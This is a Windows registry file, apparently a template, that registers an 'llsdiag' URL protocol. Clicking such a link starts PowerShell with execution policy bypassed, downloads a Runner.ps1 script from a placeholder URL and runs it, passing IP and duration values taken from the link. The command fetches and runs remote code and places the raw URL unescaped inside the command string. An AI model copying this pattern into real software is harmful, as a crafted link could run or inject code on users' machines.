
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\llsdiag]
@="URL:LLS Diag Protocol"
"URL Protocol"=""

[HKEY_CURRENT_USER\Software\Classes\llsdiag\shell]

[HKEY_CURRENT_USER\Software\Classes\llsdiag\shell\open]

[HKEY_CURRENT_USER\Software\Classes\llsdiag\shell\open\command]
@="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy Bypass -WindowStyle Normal -Command \"$u = '%1'; if ($u -match 'ip=([^&]+)') { $ip = $matches[1] } else { $ip = '216.20.237.2' }; if ($u -match 'dur=([^&]+)') { $dur = [int]$matches[1] } else { $dur = 900 }; $src = Invoke-WebRequest -UseBasicParsing 'https://YOUR_PAGES_URL/Runner.ps1'; Invoke-Expression $src.Content; Runner.ps1 -Ip $ip -DurationSeconds $dur\"
